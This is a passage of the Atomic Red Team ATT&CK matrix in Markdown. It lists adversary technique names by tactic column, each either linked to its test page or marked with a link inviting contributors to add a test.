| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Log Enumeration](../../T1654/T1654.md) | | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | | [Modify Registry](../../T1112/T1112.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indirect Command Execution](../../T1202/T1202.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Impair Defenses](../../T1562/T1562.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
|
||||
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
|
||||
| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
|
||||
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | | | | | | | |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Office Application Startup](../../T1137/T1137.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [Application Window Discovery](../../T1010/T1010.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data](../../T1560/T1560.md) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Video Capture](../../T1125/T1125.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Log Enumeration](../../T1654/T1654.md) | | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Unsecured Credentials: Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
